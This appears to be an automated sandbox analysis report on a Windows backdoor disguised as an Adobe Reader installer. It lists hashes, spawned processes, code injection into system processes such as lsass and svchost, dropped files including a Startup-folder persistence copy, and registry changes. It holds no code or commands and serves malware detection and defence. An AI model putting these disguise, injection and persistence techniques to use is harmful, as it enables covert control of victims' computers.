MD5: bdc1b082f5d3b070957d165568231ae0
SHA1: 12ddf65d15992f38f3d686c80f1e42eff741eb0e
SHA256: 8a9d897f2c50bd3c48a1974821bff1595b417cd95958f9ff37ea69fa7e0c798a
SSDeep: 3072:irRt6MGIiUbxrUwsMq973yA3VGi1TidYA5WqMTtJV3S6:yUfITxATwsVGXd3khTtv
Size: 339968 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2004-07-19 08:16:45
Analyzed on: WindowsXP SP3 32-bit

Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

AdbeRdr1012_en_US.exe:2376
verclsid.exe:3676
verclsid.exe:3632
verclsid.exe:3604
4DB6BWx9:376
MsiExec.exe:868
MsiExec.exe:3484
MsiExec.exe:3076
%original file name%.exe:560
Adobe_Updater.exe:3548
setup.exe:2840
csslisog.exe:2160
csslisog.exe:580

The Backdoor injects its code into the following process(es):

vmacthlp.exe:892
svchost.exe:1332
svchost.exe:432
wmiprvse.exe:228
Explorer.EXE:532
services.exe:724
lsass.exe:736
svchost.exe:904
svchost.exe:988
svchost.exe:1084
svchost.exe:1128
svchost.exe:1180
spoolsv.exe:1424
jqs.exe:1640

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process AdbeRdr1012_en_US.exe:2376 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Data1.cab (895790 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12810\config.bin (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12810\installer.bin (286043 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AcroRead.msi (15021 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Setup.ini (498 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\setup.exe (9595 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AdbeRdrUpd1012.msp (115622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AdobeSFX.log (6393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12810\RDC.bin (114531 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\ABCPY.INI (1 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\1242.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12810 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12810\installer.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12810\config.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12810\18028.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12810\RDC.bin (0 bytes)

The process 4DB6BWx9:376 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\csslisog.exe (2105 bytes)

The process MsiExec.exe:3484 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\assembly\GAC_32 (4 bytes)
C:\ (4 bytes)
%WinDir%\SoftwareDistribution\Download\211409fc1d99b95b32fb0344cad140df (4 bytes)
%Documents and Settings%\%current user%\Favorites (4 bytes)
%WinDir%\SoftwareDistribution\Download\621a08ac003b616bcaa86aa4d4292d50 (4 bytes)
%System%\CatRoot2 (96 bytes)
%WinDir%\ime\imkr6_1 (4 bytes)
%WinDir%\pchealth\helpctr\System\sysinfo\graphics (4 bytes)
%WinDir%\pchealth\helpctr\Config (4 bytes)
%WinDir%\SoftwareDistribution\Download\cb88a2f03b29735db957d61a63df6504 (4 bytes)
%WinDir%\pchealth\helpctr\System\images (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\updater.log (10010 bytes)
%Documents and Settings%\ALL USERS (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Providers (4 bytes)
%WinDir%\SoftwareDistribution\Download\36a2296f631a54daefcc3b56e3d990e2 (4 bytes)
%WinDir%\pchealth\helpctr\System\Remote Assistance (4 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
%Program Files%\Common Files\Microsoft Shared\DW (4 bytes)
%WinDir%\SoftwareDistribution\Download\1c47f41cc76cde4c629564d7564f2795 (4 bytes)
%WinDir%\SoftwareDistribution\Download\c263092dccc247f68a43cfee93ecc72d (4 bytes)
%WinDir%\pchealth\helpctr\Vendors\CN=Microsoft Corporation,L=Redmond,S=Washington,C=US\Remote Assistance (4 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32 (28 bytes)
%WinDir%\SoftwareDistribution\Download\78cf8552430e25a8f24bc1e4dfb1970e (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727 (1272 bytes)
%WinDir%\SoftwareDistribution\Download\2e6b16219034e135b4f869efb7a10fee (4 bytes)
%System%\drivers (672 bytes)
%WinDir%\SoftwareDistribution\Download\8bb5f1c638778df6b77d80bc61ffc63c (4 bytes)
%WinDir%\assembly\NativeImages_v4.0.30319_32\System.ServiceModel# (4 bytes)
%Documents and Settings%\%current user% (8 bytes)
%WinDir%\Temp\Perflib_Perfdata_668.dat (4 bytes)
%WinDir%\pchealth\helpctr\System\panels (4 bytes)
%Program Files%\Common Files\System (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Users (4 bytes)
%WinDir%\SoftwareDistribution\Download\e0c0da396303f1dd2c82cd2ccc07020d (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs (4 bytes)
%WinDir%\SoftwareDistribution\Download\6a410a1bd174bc123056d235ac4829af (4 bytes)
%WinDir%\SoftwareDistribution\Download\21156e54b0f0f47f81dab4a39e109501 (4 bytes)
%WinDir%\SoftwareDistribution\Download\c0c52c03306062533f7dcb087bfcfa6b (4 bytes)
%WinDir%\SoftwareDistribution\Download\07a96de176867bc25b7dc839d22b07e2 (4 bytes)
%WinDir%\SoftwareDistribution\Download\8cac00e8efc87d728c0261686f85c975 (4 bytes)
%WinDir%\SoftwareDistribution\Download\d48a3b967ba5709df048e8f2a49cf8a6 (4 bytes)
%Documents and Settings%\%current user%\SendTo (4 bytes)
%WinDir%\assembly\NativeImages_v4.0.30319_32\System.DirectorySer# (4 bytes)
%Program Files%\Common Files\Adobe\Acrobat\ActiveX (4 bytes)
%WinDir%\SoftwareDistribution\Download\cedca0128a48437390192d906f83a717 (4 bytes)
%WinDir%\SoftwareDistribution\Download\aadd6ccc4585cbf4ee04287eb0e679df (4 bytes)
%System%\config\systemprofile\Start Menu\Programs\Accessories (4 bytes)
%WinDir%\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualBas# (4 bytes)
%WinDir%\SoftwareDistribution\Download\022593ca08eb4cd8e9681a7116f902d9 (4 bytes)
%WinDir%\SoftwareDistribution\Download\e79028ac4f02e201b61b2c632cb0fc5e (4 bytes)
%WinDir%\SoftwareDistribution\Download\6b7f938fb3db15dab273f3f1702c318c (4 bytes)
%WinDir%\pchealth\helpctr\System (4 bytes)
%WinDir% (288 bytes)
%Program Files%\Adobe\Reader 10.0\Reader (200 bytes)
%WinDir%\pchealth\helpctr\OfflineCache (4 bytes)
%WinDir%\Microsoft.NET\Framework\v3.5\Microsoft .NET Framework 3.5 (384 bytes)
%WinDir%\SoftwareDistribution\Download\a4c07d9275eb613d842cb1e140d8a426 (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles (8 bytes)
%System%\config\systemprofile (4 bytes)
%WinDir%\SoftwareDistribution\Download\2c95b28351986132d7f36dd28eece9b0 (4 bytes)
%System%\spool\XPSEP\amd64 (4 bytes)
%Program Files%\Movie Maker\Shared (4 bytes)
%System%\config (8 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\PresentationFramewo# (4 bytes)
%WinDir%\SoftwareDistribution\Download\50e2c72fd814d3841e776dd2c4918260 (4 bytes)
%System%\wbem (588 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%WinDir%\assembly\GAC_32 (4 bytes)
%WinDir%\SoftwareDistribution\Download\de81b460c3abcfc5b8494c785a5f3944 (4 bytes)
%WinDir%\SoftwareDistribution\Download\cd75fc2c9aa3d47009fe2d95c9f43154 (4 bytes)
%WinDir%\SoftwareDistribution\Download\0c1e5e0ffeb238b1ee5c9ea3a4878374 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data (4 bytes)
%WinDir%\SoftwareDistribution\Download\21cbd3f70584651805685eba1753505f (4 bytes)
%WinDir%\assembly\NativeImages_v4.0.30319_32 (28 bytes)
%WinDir%\SoftwareDistribution\Download\bc81666f3868f34642e3f5adbc2719f9 (4 bytes)
%WinDir%\Installer\$PatchCache$\Managed (4 bytes)
%WinDir%\SoftwareDistribution\Download\9460002f6d8231358fc1eb590f9b1dce (4 bytes)
%WinDir%\SoftwareDistribution\Download\f2adb0f8440e5dbd459aa6bfcaed1ba5 (4 bytes)
%WinDir%\SoftwareDistribution\Download\01229cf5dcf0df67992cac35a2ba0b3f (4 bytes)
%System%\config\systemprofile\Local Settings (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security (4 bytes)
%System%\CatRoot (4 bytes)
%WinDir%\SoftwareDistribution\Download\17e46901add634f15d293735648771e6 (4 bytes)
%WinDir%\SoftwareDistribution\Download\85947e1a809663c7f480717673587a59 (4 bytes)
%Program Files%\Adobe\Reader 10.0\Reader\plug_ins3d (4 bytes)
%Program Files%\Adobe\Reader 10.0 (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles (4 bytes)
%Program Files%\Reference Assemblies\Microsoft\Framework\v3.0 (4 bytes)
%WinDir%\Help\Tours\WindowsMediaPlayer\Img (4 bytes)
%WinDir%\ime\imjp8_1 (4 bytes)
%WinDir%\SoftwareDistribution\Download\e8252bbfa91fcf5afb38775b18691074 (4 bytes)
%WinDir%\SoftwareDistribution\Download\8b9a83d2cde55eb19dc502cc2dd04e0d (4 bytes)
%WinDir%\SoftwareDistribution\Download\da2a33b6770f970d7fe7262040f98a4f (4 bytes)
%WinDir%\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744AA0100000010\10.1.0 (100 bytes)
%System%\mui (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\AppConfig (4 bytes)
%Program Files%\Reference Assemblies\Microsoft\Framework\v3.5 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%System%\spool\XPSEP\i386 (4 bytes)
%WinDir%\Microsoft.NET\Framework\v3.5 (12 bytes)
%System%\config\systemprofile\Application Data\Microsoft (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\CONFIG (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~1E.tmp (676 bytes)
%WinDir%\SoftwareDistribution\Download\23e79e5fb28793d8cb1c2055b0d8dcb9 (4 bytes)
%Program Files%\Common Files\Microsoft Shared (4 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard (4 bytes)
%WinDir%\SoftwareDistribution\Download\b91377d1d56820d9d699c0c2dc7c8e80 (4 bytes)
%WinDir%\SoftwareDistribution\Download\57b4b90cc3eead9f6c29b58581d03ae4 (4 bytes)
%Program Files%\Adobe\Reader 10.0\Reader\plug_ins (4 bytes)
%WinDir%\SoftwareDistribution\Download\30438597a812a5d1d7979088d451747f (4 bytes)
%WinDir%\SoftwareDistribution\Download\b5f880834ad67f3d383ffff5f2fa46bd (4 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\SetupCache\Client (8 bytes)
%System%\oobe (8 bytes)
%Program Files%\Common Files\VMware\Drivers (4 bytes)
%WinDir%\SoftwareDistribution\Download\abaf10b7d55d3716fbb63e0b568cb4b6 (4 bytes)
%Program Files%\Microsoft Office\Office14 (4 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Permissions (4 bytes)
%System%\oobe\html\mouse (4 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\System.DirectorySer# (4 bytes)
%Program Files%\Common Files\Microsoft Shared\OFFICE14 (4 bytes)
%WinDir%\SoftwareDistribution\Download\b6f4642d2b8dc03c5ce1b1a4f77b1bda (4 bytes)
%System%\config\systemprofile\Start Menu\Programs (4 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\WPF (4 bytes)
%WinDir%\Web\printers (4 bytes)
%WinDir%\Installer (96 bytes)
%WinDir%\Microsoft.NET\Framework\v3.0\Windows Communication Foundation (4 bytes)
%WinDir%\SoftwareDistribution\Download\c0e4033a7ec549e982572f0d830cf5d0 (4 bytes)
%WinDir%\SoftwareDistribution\Download\bc8ea6c22fd142de8dd67336d23310cf (4 bytes)
%WinDir%\Microsoft.NET\assembly\GAC_MSIL (28 bytes)
%WinDir%\assembly\NativeImages_v4.0.30319_32\PresentationFramewo# (4 bytes)
%WinDir%\SoftwareDistribution\Download\ee4e3d4bf0d346e1b8fdee8197195e59 (4 bytes)
C:\Config.Msi (772 bytes)
%WinDir%\SoftwareDistribution\Download\163d01893aa68b49abc63d8d6c9a7bb2 (4 bytes)
%WinDir%\assembly\GAC_MSIL (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\aumLib.log (1203 bytes)
%WinDir%\SoftwareDistribution\Download\dffcab319e36b852e5b2d51802010a7a (4 bytes)
%WinDir%\SoftwareDistribution\Download\9cf59263a134ab3fbbee78365a2fa5fc (4 bytes)
%Program Files%\Adobe\Reader 10.0\Resource (4 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319 (196 bytes)
%WinDir%\SoftwareDistribution\Download\0000894bab70b145c3629920ba907f7a (4 bytes)
%WinDir%\WinSxS\Policies (8 bytes)
%WinDir%\SoftwareDistribution\Download (1632 bytes)
%System%\oobe\html (4 bytes)
%WinDir%\SoftwareDistribution\Download\299840a657dd26ca3bbf3cee3ec999ba (4 bytes)
%WinDir%\Microsoft.NET\Framework\v3.0\WPF (4 bytes)
%WinDir%\pchealth\helpctr (4 bytes)
%WinDir%\SoftwareDistribution\Download\f0fea42f69058000617da24986c3b109 (4 bytes)
%WinDir%\SoftwareDistribution\Download\e5c5fc9bd7a4957f0a45c6db2957c5c9 (4 bytes)
%WinDir%\SoftwareDistribution\Download\bc529fa49cb2cb097fdf1e22d25872da (4 bytes)
%WinDir%\SoftwareDistribution\Download\196fa81559690e2494e56094df51cdd8 (4 bytes)
%WinDir%\SoftwareDistribution\Download\c656e6c592787a464f852186d6e0b466 (4 bytes)
%WinDir%\SoftwareDistribution\Download\248802b74506342031e926839639c729 (4 bytes)
%WinDir%\Help\Tours\WindowsMediaPlayer (4 bytes)
%WinDir%\SoftwareDistribution\Download\7dc26e8888d68d9e04bc52940c0f24b5 (4 bytes)
%WinDir%\SoftwareDistribution\Download\e104dcd29adf1c6c473a5efad2d509be (4 bytes)
%WinDir%\SoftwareDistribution\Download\906245b7f0992255b054322b77475594 (4 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Adobe\Updater6\AdobeESDGlobalApps.xml (0 bytes)

The process MsiExec.exe:3076 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~1E.tmp (968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001}\FixTransforms.exe (422180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001}\FixTransforms.exe (422180 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001}\FixTransforms.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001}\FixTransforms.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~1E.tmp (0 bytes)
%System%\Elevation.tmp (0 bytes)

The process %original file name%.exe:560 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\csslisog.exe (2105 bytes)

The process Adobe_Updater.exe:3548 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\AdobeUpdaterPrefs.dat (1088 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\aum.log (2309 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\AdobeUpdaterPrefs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\crl (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Data (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\ESD (0 bytes)

The process csslisog.exe:2160 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\jyabgndb.exe (2105 bytes)

The process csslisog.exe:580 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\Startup\swegbgid.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jyabgndb.exe (2105 bytes)

Registry activity

The process AdbeRdr1012_en_US.exe:2376 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 0C 1D 0A 00 65 79 06 E3 C3 CE 03 0A C3 28 C8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process verclsid.exe:3676 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 F9 EE 6B E2 8A 75 89 FF 6D C8 50 62 3C E6 3E"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process verclsid.exe:3632 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C E1 CD A3 4A 05 75 59 76 65 69 BB 86 49 CF 71"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process verclsid.exe:3604 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 DC 69 F6 29 91 0F D8 48 5B 0D A3 5F 00 51 AF"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process 4DB6BWx9:376 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 F6 48 06 3D 2A A2 5D C6 E1 63 2A F1 26 79 C9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process MsiExec.exe:868 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC C4 DE B8 DE 3A C7 8B DA FC CC D9 96 25 9B C9"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process MsiExec.exe:3484 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"SetupCacheExport" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"OriginalDatabase" = "%WinDir%\Installer\174e13.msi"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"reader" = "%Program Files%\Adobe\Reader 10.0\Reader\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"ProductName" = "Adobe Reader X (10.1.2)"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"WindowsFolder" = "%WinDir%\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"ProductName" = "Adobe Reader 9.3.4"
"DeleteUpdateFolder" = "Yes"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"AllUsers" = "1"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"DefragResetProgress" = "No"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"DefragResetProgress" = "No"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"OriginalDatabase" = "%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AcroRead.msi"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"CACHE_DIR" = "%Program Files%\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A93000000001}\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"CACHE_DIR" = "%Program Files%\Adobe\Reader 10.0\Setup Files\{AC76BA86-7AD7-1033-7B44-AA1000000001}\"
"DeleteUpdateFolder" = "Yes"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"SetupCacheExport" = ""

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"ALLUSERS_APPDATA_ADOBE" = "%Documents and Settings%\All Users\Application Data\Adobe\"
"ReinstallMode" = "omus"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"plug_ins" = "%Program Files%\Adobe\Reader 9.0\Reader\plug_ins\"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 0C 52 6E 14 A3 7A 3A 3D 5C CD 35 D8 D3 F7 AF"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"ACTIVE_X" = "%Program Files%\Common Files\Adobe\Acrobat\ActiveX\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"plug_ins" = "%Program Files%\Adobe\Reader 10.0\Reader\plug_ins\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Common Files\Adobe\Acrobat\ActiveX,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\acrobat\shell\open\ddeexec\application]
"(Default)" = "AcroViewR10"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"ReinstallMode" = "omus"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"WindowsFolder" = "%WinDir%\"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"remove" = "ALL"

[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"DEFAULT_VERB" = "Read"
"ProductCode" = "{AC76BA86-7AD7-1033-7B44-AA1000000001}"

